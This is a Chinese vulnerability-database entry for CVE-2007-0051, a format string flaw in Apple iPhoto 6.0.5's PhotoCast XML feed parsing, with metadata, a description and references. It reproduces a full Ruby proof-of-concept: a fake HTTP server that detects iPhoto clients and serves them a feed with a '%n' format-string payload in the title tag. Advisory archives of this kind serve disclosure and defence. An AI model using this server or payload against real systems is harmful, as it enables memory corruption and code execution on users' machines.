Apple iLife iPhoto PhotoCast XML远程格式串处理漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111936 漏洞类型 格式化字符串
发布时间 2007-01-04 更新时间 2007-03-14
CVE编号 CVE-2007-0051 CNNVD-ID CNNVD-200701-014
漏洞平台 OSX CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/3080
https://www.securityfocus.com/bid/21871
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-014
|漏洞详情
AppleiLifeiPhoto软件允许用户在网站上制作并分享照片页面。iLifeiPhoto在处理PhotocastXMLfeed时存在格式串处理漏洞,远程攻击者可能利用此漏洞在用户机器上执行任意指令。如果PhotocastXMLfeed的"title"标签包含有特制的格式串标识符的话,则用户受骗订阅了该Photocastfeed就会导致在客户端机器上执行任意指令。
|漏洞EXP
#!/usr/bin/ruby
#
# (c) 2006 LMH <lmh [at] info-pull.com>
# bug by Kevin Finisterre <kf_lists [at] digitalmunition.com>
# proof of concept for MOAB-04-01-2007
# see http://projects.info-pull.com/moab/MOAB-04-01-2007.rb

require 'socket'

IPHOTO_FEED = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n" +
              "<rss version=\"2.0\" xmlns:aw=\"http://www.apple.com/ilife/wallpapers\">\r\n" +
              "<channel>\r\n" +
              "<title>" + ("A" * 256) + "%x.%n.%n.%n.%n.%n</title>\r\n" +
              "<item>\r\n" +
              "<title>In Gruber We Trust</title>\r\n" +
              "<aw:image>http://www.digitalmunition.com/digital_munitions_detonator.jpg\r\n" +
              "</aw:image>\r\n" +
              "</item>\r\n" +
              "</channel>\r\n" +
              "</rss>\r\n"

web_port    = (ARGV[0] || 80).to_i

puts "++ Starting fake HTTP server at port #{web_port}."
web_server  = TCPServer.new(nil, web_port)
while (session = web_server.accept)
  user_agent = session.recvfrom(2000)[0].scan(/User-Agent: (.*)/).flatten[0]
  session.print "HTTP/1.1 200/OK\r\nServer: Unabomber/1.0\r\n"
  
  # Check if remote user-agent is iPhoto.
  if user_agent.scan(/iPhoto/).size < 1
    puts "-- User connected (#{session.peeraddr[3]}) but not running iPhoto, sending bullshit."
    session.print "Content-type: text/plain\r\n\r\n"
    session.print "All your Aunt Sophia are belong to us."
  else
    puts "++ iPhoto #{user_agent.scan(/iPhoto\/(.+?) /)[0]} user connected (#{session.peeraddr[3]}), " +
         "sending payload (#{IPHOTO_FEED.size} bytes)."
    session.print "Content-type: text/xml\r\n\r\n"
    session.print IPHOTO_FEED
  end

  session.close
end

# milw0rm.com [2007-01-04]
|受影响的产品
Apple iPhoto 6.0.5 (316)
|参考资料

来源:XF
名称:iphoto-xmltitle-format-string(31281)
链接:http://xforce.iss.net/xforce/xfdb/31281
来源:BID
名称:21871
链接:http://www.securityfocus.com/bid/21871
来源:BUGTRAQ
名称:20070104DMA[2007-0104a]-'iLifeiPhotoPhotocasingFormatStringVulnerability'
链接:http://www.securityfocus.com/archive/1/archive/1/455968/100/0/threaded
来源:MILW0RM
名称:3080
链接:http://www.milw0rm.com/exploits/3080
来源:VUPEN
名称:ADV-2007-0057
链接:http://www.frsirt.com/english/advisories/2007/0057
来源:MISC
链接:http://www.digitalmunition.com/DMA%5B2007-0104a%5D.txt
来源:SECUNIA
名称:23615
链接:http://secunia.com/advisories/23615
来源:MISC
链接:http://projects.info-pull.com/moab/MOAB-04-01-2007.html
来源:OSVDB
名称:31165
链接:http://osvdb.org/31165
来源:MILW0RM
名称:3080
链接:http://milw0rm.com/exploits/3080
来源:APPLE
名称:APPLE-SA-2007-03-13
链接:http://lists.apple.com/archives/security-announce/2007/Mar//msg00003.html
来源:docs.info.apple.com
链接:http://docs.info.apple.com/article.html?artnum=305215
来源:FULLDISC
名称:20070104DMA[2007-0104a]-'iLifeiPhotoPhotocasingFormatStr